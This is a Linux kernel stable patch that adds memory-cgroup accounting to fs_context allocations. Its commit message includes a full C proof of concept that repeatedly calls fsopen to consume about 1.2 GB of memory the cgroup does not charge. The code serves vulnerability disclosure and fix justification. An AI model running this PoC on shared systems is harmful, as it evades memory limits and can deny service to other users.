| From bb902cb47cf93b33cd92b3b7a4019330a03ef57f Mon Sep 17 00:00:00 2001 |
| From: Yutian Yang <nglaive@gmail.com> |
| Date: Thu, 2 Sep 2021 14:55:07 -0700 |
| Subject: memcg: charge fs_context and legacy_fs_context |
| |
| From: Yutian Yang <nglaive@gmail.com> |
| |
| commit bb902cb47cf93b33cd92b3b7a4019330a03ef57f upstream. |
| |
| This patch adds accounting flags to the fs_context and legacy_fs_context |
| allocation sites so that the kernel can correctly charge these objects. |
| |
| We have written a PoC to demonstrate the effect of the missing-charge |
| bugs. The PoC consumes around 1,200MB of unaccounted memory, while it is |
| charged for only 362MB of memory usage. We evaluated the PoC on QEMU |
| x86_64 v5.2.90 + Linux kernel v5.10.19 + Debian buster. All limits, |
| including ulimits and sysctl variables, are left at their defaults. |
| Specifically, the hard NOFILE limit and nr_open in sysctl are both |
| 1,048,576. |
| |
| /*------------------------- POC code ----------------------------*/ |
| |
| #define _GNU_SOURCE |
| #include <sys/types.h> |
| #include <sys/file.h> |
| #include <time.h> |
| #include <sys/wait.h> |
| #include <stdint.h> |
| #include <stdlib.h> |
| #include <unistd.h> |
| #include <stdio.h> |
| #include <signal.h> |
| #include <sched.h> |
| #include <fcntl.h> |
| #include <linux/mount.h> |
| |
| #define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \ |
| } while (0) |
| |
| #define STACK_SIZE (8 * 1024) |
| #ifndef __NR_fsopen |
| #define __NR_fsopen 430 |
| #endif |
| /* |
|  * Issue the fsopen system call through syscall(), using the __NR_fsopen |
|  * number, and hand back syscall()'s result narrowed to int. |
|  */ |
| static inline int fsopen(const char *fs_name, unsigned int flags) |
| { |
|     long ret = syscall(__NR_fsopen, fs_name, flags); |
| |
|     return (int)ret; |
| } |
| |
| static char thread_stack[512][STACK_SIZE]; |
| |
| /* |
|  * Child entry point handed to clone(): performs 800000 fsopen("nfs") calls, |
|  * exiting via errExit() on the first failure, and then spins forever. |
|  * The returned descriptors are not stored and are never closed. |
|  * 'arg' is unused. |
|  */ |
| int thread_fn(void* arg) |
| { |
|     int remaining = 800000; |
| |
|     while (remaining-- > 0) { |
|         if (fsopen("nfs", FSOPEN_CLOEXEC) == -1) { |
|             errExit("fsopen"); |
|         } |
|     } |
| |
|     /* Spin forever; control never reaches the return below. */ |
|     for (;;) |
|         ; |
|     return 0; |
| } |
| |
| /* |
|  * PoC driver: start one child running thread_fn() via clone(), then spin |
|  * forever in the parent. |
|  * |
|  * The child's stack is a slot of the static thread_stack array; the address |
|  * passed to clone() is the end of that slot (slot base + STACK_SIZE). |
|  * If clone() fails (returns -1), report the error and exit instead of |
|  * spinning with no child running. |
|  */ |
| int main(int argc, char *argv[]) { |
|     int thread_pid; |
| |
|     for (int i = 0; i < 1; ++i) { |
|         thread_pid = clone(thread_fn, thread_stack[i] + STACK_SIZE, |
|                            SIGCHLD, NULL); |
|         if (thread_pid == -1) { |
|             errExit("clone"); |
|         } |
|     } |
| |
|     /* Spin forever in the parent; the return below is never reached. */ |
|     while(1); |
|     return 0; |
| } |
| |
| /*-------------------------- end --------------------------------*/ |
| |
| Link: https://lkml.kernel.org/r/1626517201-24086-1-git-send-email-nglaive@gmail.com |
| Signed-off-by: Yutian Yang <nglaive@gmail.com> |
| Reviewed-by: Shakeel Butt <shakeelb@google.com> |
| Cc: Michal Hocko <mhocko@kernel.org> |
| Cc: Johannes Weiner <hannes@cmpxchg.org> |
| Cc: Vladimir Davydov <vdavydov.dev@gmail.com> |
| Cc: <shenwenbo@zju.edu.cn> |
| Signed-off-by: Andrew Morton <akpm@linux-foundation.org> |
| Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> |
| Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> |
| --- |
| fs/fs_context.c | 4 ++-- |
| 1 file changed, 2 insertions(+), 2 deletions(-) |
| |
| --- a/fs/fs_context.c |
| +++ b/fs/fs_context.c |
| @@ -231,7 +231,7 @@ static struct fs_context *alloc_fs_conte |
| struct fs_context *fc; |
| int ret = -ENOMEM; |
| |
| - fc = kzalloc(sizeof(struct fs_context), GFP_KERNEL); |
| + fc = kzalloc(sizeof(struct fs_context), GFP_KERNEL_ACCOUNT); |
| if (!fc) |
| return ERR_PTR(-ENOMEM); |
| |
| @@ -631,7 +631,7 @@ const struct fs_context_operations legac |
| */ |
| static int legacy_init_fs_context(struct fs_context *fc) |
| { |
| - fc->fs_private = kzalloc(sizeof(struct legacy_fs_context), GFP_KERNEL); |
| + fc->fs_private = kzalloc(sizeof(struct legacy_fs_context), GFP_KERNEL_ACCOUNT); |
| if (!fc->fs_private) |
| return -ENOMEM; |
| fc->ops = &legacy_fs_context_ops; |